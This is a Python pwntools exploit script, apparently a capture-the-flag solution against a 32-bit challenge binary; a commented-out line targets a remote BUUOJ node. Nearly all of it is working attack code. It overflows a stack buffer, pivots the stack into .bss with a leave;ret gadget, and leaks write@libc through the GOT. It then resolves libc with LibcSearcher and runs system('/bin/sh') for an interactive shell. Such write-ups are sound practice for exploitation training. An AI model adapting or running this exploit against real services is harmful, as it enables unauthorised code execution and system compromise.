from pwn import *
from LibcSearcher import *
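# Stack-pivot ret2libc for the 32-bit non-PIE challenge binary `./a`.
#
# Flow: the "name" prompt stores our input at a fixed .bss address; the
# "say" prompt overflows a stack buffer. We overwrite saved ebp with the .bss
# address and the return address with a `leave; ret` gadget, so `leave`
# moves esp into .bss and `ret` starts executing the fake frame we staged
# there. Round 1 leaks write@libc through write(1, write@got, 4) and returns
# to main; round 2 pivots again into system("/bin/sh").
#
# Switch the target by swapping the two lines below.
# p = remote('node4.buuoj.cn', 25986)
p = process('./a')
context(arch='i386', os='linux', log_level='debug')
e = ELF('./a')

# Binary-specific constants (hard-coded from the challenge binary; re-derive
# them if the binary changes):
#   level_ret_addr - presumably a `leave; ret` gadget ("level" is a typo for
#                    "leave"); it is what performs the pivot into .bss
#   bss_addr       - fixed, writable .bss buffer the "name" input is stored in
#   main_addr      - re-entry point so the program accepts a second round
level_ret_addr = 0x08048511
bss_addr = 0x0804A300
main_addr = 0x08048513
# Fake-frame layout: 4 filler bytes (popped into ebp by `leave`), then the
# call target, its return address and up to two args -> the "/bin/sh" string
# placed after those four dwords starts 16 bytes into the buffer.
binsh_addr = bss_addr + 4 * 4

# ---- round 1: leak write@libc -------------------------------------------
write_plt = e.plt['write']
write_got = e.got['write']
# .bss frame: [ebp filler][write@plt][ret -> main][fd=1][buf=write@got][len=4]
payload01 = b'aaaa' + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
# Stack overflow: 0x18 bytes of filler, saved ebp -> bss_addr, ret -> leave;ret.
payload02 = b'a' * 0x18 + p32(bss_addr) + p32(level_ret_addr)
p.recvuntil(b"What is your name?")
p.send(payload01)
p.recvuntil(b"What do you want to say?")
p.send(payload02)
# The first 4 bytes emitted after the pivot are the raw GOT entry (little-endian).
write_addr = u32(p.recv(4))
log.info(f"write@libc = {write_addr:#x}")

# Resolve the libc build from the leaked address and compute system().
o = LibcSearcher('write', write_addr)
libc_base = write_addr - o.dump('write')
system_addr = libc_base + o.dump('system')
log.info(f"libc base = {libc_base:#x}, system = {system_addr:#x}")

# ---- round 2: pivot into system("/bin/sh") --------------------------------
# .bss frame: [ebp filler][system][fake ret = 0][arg0 = &"/bin/sh"]["/bin/sh\0"]
# The string is NUL-terminated explicitly instead of relying on whatever
# byte round 1 left at that offset in .bss.
payload1 = b'aaaa' + p32(system_addr) + p32(0) + p32(binsh_addr) + b'/bin/sh\x00'
p.recvuntil(b"What is your name?")
p.send(payload1)
# Wait for the exact prompt rather than an arbitrary chunk of output, so the
# second overflow is not sent before the program is reading it.
p.recvuntil(b"What do you want to say?")
payload2 = b'a' * 0x18 + p32(bss_addr) + p32(level_ret_addr)
p.send(payload2)
p.interactive()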